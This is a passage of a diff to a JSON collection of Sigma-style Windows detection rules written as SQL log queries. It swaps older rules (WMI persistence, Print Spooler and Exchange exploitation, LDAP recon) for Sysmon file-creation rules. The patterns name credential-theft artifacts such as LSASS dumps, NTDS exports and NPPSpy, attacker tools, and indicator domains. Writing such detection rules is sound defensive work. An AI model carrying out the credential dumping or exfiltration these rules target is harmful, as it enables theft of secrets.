'%https://statics.teams.cdn.office.net/%' ESCAPE '\\' OR Path LIKE '%microsoft.com%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_uncommon_package_locations.yml" + "filename": "file_event_win_hktl_nppspy.yml" }, { - "title": "WMI Persistence", - "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "title": "LSASS Memory Dump File Creation", + "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" ], - "filename": "win_wmi_persistence.yml" + "filename": "file_event_win_lsass_memory_dump_file_creation.yml" }, { - "title": "Sysinternals Tools AppX Versions Execution", - "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", + "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", + "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", "status": "experimental", - "description": "Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell creating a binary executable or script file.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of the applications from the Windows Store" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" + "filename": "file_event_win_powershell_drop_binary.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "title": "Suspicious MSExchangeMailboxReplication ASPX Write", + "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" + "attack.initial_access", + "attack.t1190", + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" + "filename": "file_event_win_susp_exchange_aspx_write.yml" }, { - "title": "Potential Active Directory Reconnaissance/Enumeration Via LDAP", - "id": "31d68132-4038-47c7-8f8e-635a39a7c174", - "status": "test", - "description": "Detects potential Active Directory enumeration via LDAP", - "author": "Adeem Mawani", + "title": "Office Macro File Download", + "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", + "status": "experimental", + "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.002", - "attack.t1087.002", - "attack.t1482" + "attack.initial_access", + "attack.t1566.001" + ], + "falsepositives": [ + "Legitimate macro files downloaded from the internet", + "Legitimate macro files sent as attachments via emails" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((EventID = '30' AND (SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483648)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483656)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483652)%' ESCAPE '\\' OR SearchFilter LIKE '%(groupType:1.2.840.113556.1.4.803:=2147483650)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306369)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=805306368)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870913)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=536870912)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435457)%' ESCAPE '\\' OR SearchFilter LIKE '%(sAMAccountType=268435456)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=groupPolicyContainer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=organizationalUnit)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=Computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=nTDSDSA)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=domain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=person)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectCategory=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=trustedDomain)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=computer)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=server)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=group)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectClass=user)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=521)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=516)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=515)%' ESCAPE '\\' OR SearchFilter LIKE '%(primaryGroupID=512)%' ESCAPE '\\' OR SearchFilter LIKE '%Domain Admins%' ESCAPE '\\' OR SearchFilter LIKE '%objectGUID=\\*' ESCAPE '\\' OR SearchFilter LIKE '%(schemaIDGUID=\\*)%' ESCAPE '\\')) AND NOT (EventID = '30' AND (SearchFilter LIKE '%(domainSid=%)%' ESCAPE '\\' OR SearchFilter LIKE '%(objectSid=%)%' ESCAPE '\\'))) OR (EventID = '30' AND (SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=4194304)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=2097152)%' ESCAPE '\\' OR SearchFilter LIKE '%!(userAccountControl:1.2.840.113556.1.4.803:=1048574)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=524288)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=65536)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=8192)%' ESCAPE '\\' OR SearchFilter LIKE '%(userAccountControl:1.2.840.113556.1.4.803:=544)%' ESCAPE '\\' OR SearchFilter LIKE '%!(UserAccountControl:1.2.840.113556.1.4.803:=2)%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToActOnBehalfOfOtherIdentity%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-AllowedToDelegateTo%' ESCAPE '\\' OR SearchFilter LIKE '%msDS-GroupManagedServiceAccount%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=9223372036854775807)%' ESCAPE '\\' OR SearchFilter LIKE '%(accountExpires=0)%' ESCAPE '\\' OR SearchFilter LIKE '%(adminCount=1)%' ESCAPE '\\' OR SearchFilter LIKE '%ms-MCS-AdmPwd%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\safari.exe' ESCAPE '\\' OR Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" ], - "filename": "win_ldap_recon.yml" + "filename": "file_event_win_office_macro_files_downloaded.yml" }, { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Publisher Attachment File Dropped In Suspicious Location", + "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "status": "experimental", + "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of \".pub\" files from those locations" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" ], - "filename": "win_codeintegrity_revoked_driver.yml" + "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" }, { - "title": "Code Integrity Attempted DLL Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Suspicious Screensaver Binary File Creation", + "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", "status": "experimental", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "author": "frack113", "tags": [ - "attack.execution" + "attack.persistence", + "attack.t1546.002" ], "falsepositives": [ - "Antivirus products" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\stdole.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\msdatasrc.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\adodb.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '2') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" ], - "filename": "win_codeintegrity_attempted_dll_load.yml" + "filename": "file_event_win_creation_scr_binary_file.yml" }, { - "title": "Code Integrity Blocked Driver Load", - "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", - "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Legitimate Application Dropped Archive", + "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", "status": "experimental", + "description": "Detects programs on a Windows system that should not write an archive to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_blocked_driver_load.yml" + "filename": "file_event_win_legitimate_app_dropping_archive.yml" }, { - "title": "GALLIUM Artefacts - Builtin", - "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "title": "Pingback Backdoor File Indicators", + "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", "status": "test", - "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", - "author": "Tim Burrell", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.command_and_control", - "attack.t1071" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "win_dns_analytic_apt_gallium.yml" + "filename": "file_event_win_malware_pingback_backdoor.yml" }, { - "title": "Potential Remote Desktop Connection to Non-Domain Host", - "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", - "status": "test", - "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", - "author": "James Pemberton", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], + "title": "Windows Shell/Scripting Application File Write to Suspicious Folder", + "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", + "status": "experimental", + "description": "Detects Windows shells and scripting applications that write files to suspicious folders", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Host connections to valid domains, exclude these.", - "Host connections not using host FQDN.", - "Host connections to external legitimate domains." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))))" ], - "filename": "win_susp_ntlm_rdp.yml" + "filename": "file_event_win_shell_write_susp_directory.yml" }, { - "title": "NTLM Brute Force", - "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "title": "Suspicious NTDS Exfil Filename Patterns", + "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "status": "test", - "description": "Detects common NTLM brute force device names", - "author": "Jerry Shockley '@jsh0x'", + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1110" + "attack.t1003.003" ], "falsepositives": [ - "Systems with names equal to the spoofed ones used by the brute force tools" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" ], - "filename": "win_susp_ntlm_brute_force.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "title": "New Outlook Macro Created", + "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the creation of a macro file for Outlook.", + "author": "@ScoubiMtl", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unknown" + "User genuinely creates a VB Macro for their email" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" + "filename": "file_event_win_office_outlook_macro_creation.yml" }, { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "title": "Suspicious Files in Default GPO Folder", + "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", + "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "author": "elhoim", "tags": [ - "attack.lateral_movement", - "attack.t1210" + "attack.t1036.005", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_exchange_cve_2021_42321.yml" + "filename": "file_event_win_susp_default_gpo_dir_write.yml" }, { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": 